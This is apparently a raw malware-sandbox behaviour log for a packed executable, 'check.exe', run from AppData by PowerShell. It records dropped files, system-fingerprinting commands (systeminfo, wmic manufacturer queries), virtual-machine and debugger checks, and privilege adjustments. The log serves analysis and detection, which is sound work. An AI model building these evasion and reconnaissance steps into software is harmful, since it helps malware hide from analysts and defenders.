Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\opengl32sw.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\plugins\imageformats\qtga.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5Svg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin\Qt5WebSockets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\iconusers\qsvgicon.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_4-17575

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	API coverage: 0.1 %
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	API coverage: 0.1 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6072

Thread sleep time: -9223372036854770s >= -30000s

Jump to behavior

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 4_2_00007FF6D9239280 FindFirstFileExW,FindClose,	4_2_00007FF6D9239280
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 4_2_00007FF6D92383C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	4_2_00007FF6D92383C0
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 4_2_00007FF6D9251874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	4_2_00007FF6D9251874
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 5_2_00007FF6D9239280 FindFirstFileExW,FindClose,	5_2_00007FF6D9239280

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WerFault.exe	File opened: C:\Users\user\AppData\Local\Temp\_MEI66402\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\Users\user\AppData\

Source: check.exe, 00000005.00000002.2593701431.0000018356620000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 16cHGfSolidPattern
Source: check.exe, 00000005.00000002.2581028850.00000183553FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2372928335.0000018355427000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2373665758.0000018355427000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWamil%SystemRoot%\system32\mswsock.dlls.
Source: check.exe, 00000005.00000002.2589598467.0000018355F11000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: check.exe, 00000005.00000003.2373665758.00000183553FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2372928335.00000183553FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\!

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe

Code function: 4_2_00007FF6D924A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_00007FF6D924A614

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe

Code function: 4_2_00007FF6D9253480 GetProcessHeap,

4_2_00007FF6D9253480

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 4_2_00007FF6D923D30C SetUnhandledExceptionFilter,	4_2_00007FF6D923D30C
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 4_2_00007FF6D924A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF6D924A614
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 4_2_00007FF6D923C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FF6D923C8A0
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 4_2_00007FF6D923D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF6D923D12C
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 15_2_00007FFD87592C90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00007FFD87592C90
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 15_2_00007FFD87593248 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00007FFD87593248
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 15_2_00007FFD876549A8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00007FFD876549A8
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 15_2_00007FFD876543F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00007FFD876543F0
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 24_2_00007FFD84886484 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00007FFD84886484

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe

Code function: 4_2_00007FF6D9259570 cpuid

4_2_00007FF6D9259570

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\bin VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\imageformats VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
